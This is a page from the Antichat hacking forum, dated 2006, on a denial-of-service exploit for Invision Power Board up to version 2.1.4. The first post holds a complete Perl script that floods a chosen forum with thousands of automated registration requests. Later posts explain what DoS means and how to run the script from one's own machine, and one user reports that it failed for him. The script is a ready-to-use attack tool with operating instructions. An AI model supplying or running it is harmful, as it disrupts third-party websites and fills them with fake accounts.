ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Сплоит для IPB <= 2.1.4 DOS
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

Сплоит для IPB <= 2.1.4 DOS
  #1  
Старый 20.02.2006, 13:30
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию Сплоит для IPB <= 2.1.4 DOS
Нашел недавно, проверял на 2.1.4 работает отлично!
Код:
#!/usr/bin/perl
use IO::Socket;
##########################################################
## _______ _______ ______ #
## |______ |______ | \ #
## ______| |______ |_____/ #
## #
##IPB Register Multiple Users Denial of Service #
##Doesn't Work on forums using "Code Confirmation" #
##Created By SkOd #
##SED security Team #
##http://www.sed-team.be #
##skod.uk@gmail.com #
##ISRAEL #
##########################################################

print q{
############################################################
# Invision Power Board Multiple Users DOS #
#Tested on IPB 2.0.1 #
# created By SkOd. SED Security Team #
############################################################
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$name="sedXPL_".$rand.$i;
$data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sed botbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1 &allow_member_mail=1&day=11&month=11&year=1985&agree=1";
$len = length $data;
$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
print $get1 "POST ".$path."index.php HTTP/1.0\n";
print $get1 "Host: ".$serv."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$len."\n\n";
print $get1 $data;
syswrite STDOUT, "+";
}
print "Forum shuld be Dosed. Check it out...\n";
 
Ответить с цитированием

  #2  
Старый 20.02.2006, 21:00
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию
Кто ещё проверял?
 
Ответить с цитированием

  #3  
Старый 20.02.2006, 22:19
Аватар для Zheca
Zheca
Познающий
Регистрация: 18.12.2005
Сообщений: 84
Провел на форуме:
540410

Репутация: 5
Отправить сообщение для Zheca с помощью ICQ
По умолчанию
Ну я эт скрипт недельки 2 назад юзал, тока чегото у меня ничего не сработало. Т.е скрипт то работает - плюсики там идут - но в конце пишет что типа хост в ДоСе - но нифга он не в Досе - работает как и работал. Может ошибочка есть?
 
Ответить с цитированием

  #4  
Старый 25.02.2006, 19:01
Аватар для tester
tester
Новичок
Регистрация: 18.07.2005
Сообщений: 10
Провел на форуме:
32107

Репутация: 0
По умолчанию
for ($i=0; $i<9999; $i++) - что это?
 
Ответить с цитированием

  #5  
Старый 25.02.2006, 22:11
Аватар для DooDlez
DooDlez
Познающий
Регистрация: 07.02.2006
Сообщений: 40
Провел на форуме:
115789

Репутация: 8
Отправить сообщение для DooDlez с помощью ICQ
По умолчанию
Объясните, что скрипт вооще делает, что значит Dosed :rooleyes: ?.. Только не бейте ...
 
Ответить с цитированием

  #6  
Старый 25.02.2006, 22:35
Аватар для Inferno
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию
Цитата:
Сообщение от tester  
for ($i=0; $i<9999; $i++) - что это?
Цыкл который будет выполнятся до 9999 а вобще хз!
 
Ответить с цитированием

  #7  
Старый 25.02.2006, 23:32
Аватар для degeneration x
degeneration x
Познающий
Регистрация: 11.10.2005
Сообщений: 97
Провел на форуме:
732018

Репутация: 117
По умолчанию
IPB Register Multiple Users Denial of Service
Doesn't Work on forums using "Code Confirmation"
Эти всё сказано. А вообще он пытается многократно зарегистрировать новых пользователей, DOS получается только в том случае, если на форуме не стоит бот-защита при регистрации(ввод случайной комбинации букв и цифр). А если бот-защита включена, то он сильно тормозит работу форума.
 
Ответить с цитированием

  #8  
Старый 27.02.2006, 02:43
Аватар для podkashey
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
Провел на форуме:
2821162

Репутация: 1320


По умолчанию
Dos - многократное обращение к серверу, что в итоге приводит его к ауту.
Столько пользователей и регистрирутеся для этого.
 
Ответить с цитированием

  #9  
Старый 28.02.2006, 00:13
Аватар для kirpunk
kirpunk
Новичок
Регистрация: 18.11.2005
Сообщений: 1
Провел на форуме:
25792

Репутация: 0
По умолчанию
а как его заливать? знаю что index.php? и что то там =)
 
Ответить с цитированием

  #10  
Старый 28.02.2006, 00:31
Аватар для vectorg
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
Провел на форуме:
3212607

Репутация: 454
По умолчанию
не куда ничего заливать не нужно, устанавливаешь active perl или чтото наподобие, и запускаешь со своей тачки... хотя можно и по другому, но в твоём случае я думаю нужен первый вариант
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Способы заработка для неудавшихся хакеров :d (гег) A110ut Болталка 2 07.03.2006 07:43
Ключи для WoW $@T@No$ Болталка 3 25.02.2006 20:15
Вопрос по использованию сплоита к Ipb! MaticooL Форумы 16 24.02.2006 12:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ